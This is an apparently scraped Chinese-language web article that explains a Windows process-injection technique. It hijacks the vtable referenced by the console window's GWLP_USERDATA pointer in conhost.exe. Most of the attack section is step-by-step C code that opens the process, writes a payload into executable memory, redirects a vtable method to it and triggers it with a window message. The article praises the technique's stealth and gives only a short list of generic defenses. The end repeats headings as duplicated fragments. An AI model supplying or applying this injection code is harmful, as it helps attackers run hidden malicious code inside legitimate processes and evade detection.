Windows进程注入技术：控制台窗口类用户数据注入<\/h1>

1. 技术概述<\/h2>
这是一种基于Windows控制台窗口(conhost.exe)用户数据(GWLP_USERDATA)的进程注入技术，属于"Shatter"攻击的变体。该技术通过修改控制台窗口的用户数据指针，劫持虚拟函数表(vtable)中的方法，利用窗口消息机制触发恶意代码执行。<\/p>

2. 技术原理<\/h2>

2.1 控制台窗口用户数据<\/h3>

每个Windows窗口对象都支持通过SetWindowLongPtr<\/code> API和GWLP_USERDATA<\/code>参数设置的用户数据。在控制台窗口主机(conhost)进程中：<\/p>


用户数据存储了一个数据结构体的地址<\/li>
该结构体包含窗口位置、尺寸、对象句柄等<\/li>
最重要的是包含一个带有控制控制台窗口行为方法的类对象(vtable)<\/li>
这些数据存放在有写权限的堆上<\/li>
<\/ul>
2.2 关键数据结构<\/h3>
虚拟函数表(vtable)结构<\/h4>
typedef<\/span> struct<\/span> _vftable_t {
<\/span><\/span>    ULONG_PTR EnableBothScrollBars;
<\/span><\/span>    ULONG_PTR UpdateScrollBar;
<\/span><\/span>    ULONG_PTR IsInFullscreen;
<\/span><\/span>    ULONG_PTR SetIsFullscreen;
<\/span><\/span>    ULONG_PTR SetViewportOrigin;
<\/span><\/span>    ULONG_PTR SetWindowHasMoved;
<\/span><\/span>    ULONG_PTR CaptureMouse;
<\/span><\/span>    ULONG_PTR ReleaseMouse;
<\/span><\/span>    ULONG_PTR GetWindowHandle;  \/\/ 关键方法，可用于触发执行
<\/span><\/span><\/span><\/span>    ULONG_PTR SetOwner;
<\/span><\/span>    ULONG_PTR GetCursorPosition;
<\/span><\/span>    ULONG_PTR GetClientRectangle;
<\/span><\/span>    ULONG_PTR MapPoints;
<\/span><\/span>    ULONG_PTR ConvertScreenToClient;
<\/span><\/span>    ULONG_PTR SendNotifyBeep;
<\/span><\/span>    ULONG_PTR PostUpdateScrollBars;
<\/span><\/span>    ULONG_PTR PostUpdateTitleWithCopy;
<\/span><\/span>    ULONG_PTR PostUpdateWindowSize;
<\/span><\/span>    ULONG_PTR UpdateWindowSize;
<\/span><\/span>    ULONG_PTR UpdateWindowText;
<\/span><\/span>    ULONG_PTR HorizontalScroll;
<\/span><\/span>    ULONG_PTR VerticalScroll;
<\/span><\/span>    ULONG_PTR SignalUia;
<\/span><\/span>    ULONG_PTR UiaSetTextAreaFocus;
<\/span><\/span>    ULONG_PTR GetWindowRect;
<\/span><\/span>} ConsoleWindow;
<\/span><\/span><\/code><\/pre>用户数据结构<\/h4>

总大小：104字节<\/li>
第一个64位值指向虚拟表(vtable)<\/li>
默认具有PAGE_READWRITE内存保护<\/li>
<\/ul>
3. 注入步骤详解<\/h2>
3.1 准备工作<\/h3>


获取目标控制台窗口句柄：<\/p>
HWND hwnd =<\/span> FindWindow(L<\/span>"ConsoleWindowClass"<\/span>, NULL);
<\/span><\/span><\/code><\/pre><\/li>

获取conhost.exe进程ID：<\/p>
DWORD pid, ppid;
<\/span><\/span>GetWindowThreadProcessId(hwnd, &<\/span>ppid);
<\/span><\/span>pid =<\/span> conhostId(ppid);  \/\/ 需要自定义函数获取conhost PID
<\/span><\/span><\/span><\/code><\/pre><\/li>

打开conhost进程：<\/p>
HANDLE hp =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 注入恶意代码<\/h3>


在目标进程分配内存并写入payload：<\/p>
LPVOID cs =<\/span> VirtualAllocEx(hp, NULL, payloadSize, 
<\/span><\/span>                          MEM_COMMIT |<\/span> MEM_RESERVE, 
<\/span><\/span>                          PAGE_EXECUTE_READWRITE);
<\/span><\/span>WriteProcessMemory(hp, cs, payload, payloadSize, &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

获取当前用户数据指针和虚拟表地址：<\/p>
LONG_PTR udptr =<\/span> GetWindowLongPtr(hwnd, GWLP_USERDATA);
<\/span><\/span>ReadProcessMemory(hp, (LPVOID)udptr, (LPVOID)&<\/span>vTable, 
<\/span><\/span>                sizeof<\/span>(ULONG_PTR), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

读取原始虚拟表内容：<\/p>
ConsoleWindow cw;
<\/span><\/span>ReadProcessMemory(hp, (LPVOID)vTable, (LPVOID)&<\/span>cw, 
<\/span><\/span>                sizeof<\/span>(ConsoleWindow), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.3 劫持虚拟表<\/h3>


在目标进程分配新虚拟表内存：<\/p>
LPVOID ds =<\/span> VirtualAllocEx(hp, NULL, sizeof<\/span>(ConsoleWindow), 
<\/span><\/span>                         MEM_COMMIT |<\/span> MEM_RESERVE, 
<\/span><\/span>                         PAGE_READWRITE);
<\/span><\/span><\/code><\/pre><\/li>

修改本地虚拟表副本，将GetWindowHandle指向payload：<\/p>
cw.GetWindowHandle =<\/span> (ULONG_PTR)cs;
<\/span><\/span><\/code><\/pre><\/li>

写入修改后的虚拟表到目标进程：<\/p>
WriteProcessMemory(hp, ds, &<\/span>cw, sizeof<\/span>(ConsoleWindow), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

更新用户数据指针指向新虚拟表：<\/p>
WriteProcessMemory(hp, (LPVOID)udptr, &<\/span>ds, 
<\/span><\/span>                  sizeof<\/span>(ULONG_PTR), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.4 触发执行<\/h3>


发送WM_SETFOCUS消息触发payload执行：<\/p>
SendMessage(hwnd, WM_SETFOCUS, 0<\/span>, 0<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

恢复原始虚拟表指针：<\/p>
WriteProcessMemory(hp, (LPVOID)udptr, &<\/span>vTable, 
<\/span><\/span>                  sizeof<\/span>(ULONG_PTR), &<\/span>wr);
<\/span><\/span><\/code><\/pre><\/li>

清理资源：<\/p>
VirtualFreeEx(hp, cs, 0<\/span>, MEM_DECOMMIT |<\/span> MEM_RELEASE);
<\/span><\/span>VirtualFreeEx(hp, ds, 0<\/span>, MEM_DECOMMIT |<\/span> MEM_RELEASE);
<\/span><\/span>CloseHandle(hp);
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 技术特点<\/h2>

无需创建新线程<\/strong>：利用现有窗口消息机制触发执行<\/li>
隐蔽性较高<\/strong>：操作的是合法的窗口数据结构<\/li>
适用范围<\/strong>：主要针对控制台窗口类(ConsoleWindowClass)<\/li>
系统兼容性<\/strong>：在64位Win10系统测试成功<\/li>
<\/ol>
5. 防御措施<\/h2>

限制对conhost.exe进程的访问权限<\/li>
监控窗口用户数据的异常修改<\/li>
使用最新的Windows版本和安全补丁<\/li>
实施代码完整性保护措施<\/li>
<\/ol>
6. 扩展应用<\/h2>
虽然本文主要针对控制台窗口，但其他应用程序也可能使用GWLP_USERDATA存储类对象指针，类似技术可以应用于这些场景。<\/p>

Windows进程注入技术：控制台窗口类用户数据注入<\/h1>

2. 技术原理<\/h2>

2.2 关键数据结构<\/h3>

3. 注入步骤详解<\/h2>

6. 扩展应用<\/h2> 虽然本文主要针对控制台窗口，但其他应用程序也可能使用GWLP_USERDATA存储类对象指针，类似技术可以应用于这些场景。<\/p>

6. 扩展应用<\/h2>
虽然本文主要针对控制台窗口，但其他应用程序也可能使用GWLP_USERDATA存储类对象指针，类似技术可以应用于这些场景。<\/p>